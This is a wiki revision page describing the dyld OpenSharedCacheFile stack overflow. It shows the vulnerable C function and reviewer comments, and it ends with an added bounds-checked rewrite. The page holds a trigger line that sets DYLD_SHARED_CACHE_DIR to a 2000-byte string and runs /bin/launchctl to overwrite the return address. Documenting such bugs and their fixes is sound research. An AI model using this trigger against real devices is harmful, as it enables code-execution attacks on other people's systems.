Difference between revisions of "OpenSharedCacheFile"
(Created page with "The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow == Opensharedcachefile() function == int openSharedCacheFile() { char path[1024]...") |
|||
| Line 1: | Line 1: | ||
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow |
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow |
||
== Opensharedcachefile() function == |
== Opensharedcachefile() function == |
||
| − | int openSharedCacheFile() |
+ | int openSharedCacheFile() |
| − | { |
+ | { |
| − | + | char path[1024]; |
|
| − | + | strcpy(path, sSharedCacheDir); |
|
| − | + | strcat(path, "/"); |
|
| − | + | strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); |
|
| − | + | return ::open(path, O_RDONLY); |
|
| − | } |
+ | } |
== Triggering the vuln === |
== Triggering the vuln === |
||
To trigger it, run the following |
To trigger it, run the following |
||
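Review bot: nothing in or after the openSharedCacheFile() block says which line is the defect. A sentence after the block stating that `strcpy(path, sSharedCacheDir)` copies a string of unchecked length into `char path[1024]` would make the section self-explanatory. The heading `== Opensharedcachefile() function ==` also does not match the capitalisation of the function name it introduces.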
| − | DYLD_SHARED_CACHE_DIR = “A” * 2000 \ |
+ | DYLD_SHARED_CACHE_DIR = “A” * 2000 \ |
| − | DYLD_SHARED_REGION = private /bin/launchctl |
+ | DYLD_SHARED_REGION = private /bin/launchctl |
This will overflow the PC register making it a stack overflow. |
This will overflow the PC register making it a stack overflow. |
||
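Review bot: the heading `== Triggering the vuln ===` just above these lines has two opening and three closing equals signs, so it renders with a stray `=`; it should read `== Triggering the vuln ==`. In the changed lines, `“A” * 2000` uses typographic quotes and is shorthand for a 2000-character value, not something a shell accepts as typed, so the text should say it is notation. The closing sentence would be more precise if it said the saved return address is overwritten, not that the PC register overflows.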
Revision as of 00:54, 23 March 2015
The OpenSharedCacheFile bug was found by i0n1c. It is a simple stack buffer overflow.
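 int openSharedCacheFile()
 {
     char path[1024];                  // fixed-size buffer on the stack
     strcpy(path, sSharedCacheDir);    // no length check; sSharedCacheDir is taken from DYLD_SHARED_CACHE_DIR
     strcat(path, "/");
     strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
     return ::open(path, O_RDONLY);
 }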
Triggering the vuln
To trigger it, run the following:
 DYLD_SHARED_CACHE_DIR = "A" * 2000 \
 DYLD_SHARED_REGION = private /bin/launchctl
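The 2000-byte value overflows the 1024-byte path buffer and overwrites the saved return address, so the overflowing data ends up in the PC register, making it a stack overflow.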
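A bounds-checked way to build the same path, shown as an added example (not code from this wiki page or from dyld, and not Apple's actual fix): the length is checked before anything is written past the 1024-byte buffer. The macro values and the function names build_cache_path and open_shared_cache_file_checked are assumptions made for illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

/* Assumed placeholder values: the page does not give the contents of these macros. */
#define DYLD_SHARED_CACHE_BASE_NAME "dyld_shared_cache_"
#define ARCH_NAME "armv7"

/* Build "<dir>/<base name><arch>" into out.
 * Returns 0 on success, or -1 with errno = ENAMETOOLONG when the result
 * (including its NUL terminator) does not fit in outlen bytes. */
int build_cache_path(char *out, size_t outlen, const char *dir)
{
    if (out == NULL || outlen == 0 || dir == NULL) {
        errno = EINVAL;
        return -1;
    }
    /* snprintf never writes more than outlen bytes and reports the length
     * the full string would have needed, which exposes truncation. */
    int n = snprintf(out, outlen, "%s/%s", dir,
                     DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';          /* never hand back a truncated path */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Hypothetical hardened counterpart of openSharedCacheFile(); the directory
 * is passed in explicitly instead of read from the sSharedCacheDir global. */
int open_shared_cache_file_checked(const char *dir)
{
    char path[1024];
    if (build_cache_path(path, sizeof path, dir) != 0)
        return -1;              /* oversized directory is rejected, not copied */
    return open(path, O_RDONLY);
}

int main(void)
{
    char dir[2001];             /* constructed input: the 2000-byte value from the page */
    memset(dir, 'A', 2000);
    dir[2000] = '\0';
    int fd = open_shared_cache_file_checked(dir);
    printf("2000-byte dir -> fd=%d (%s)\n", fd, strerror(errno));
    return fd == -1 ? 0 : 1;
}
```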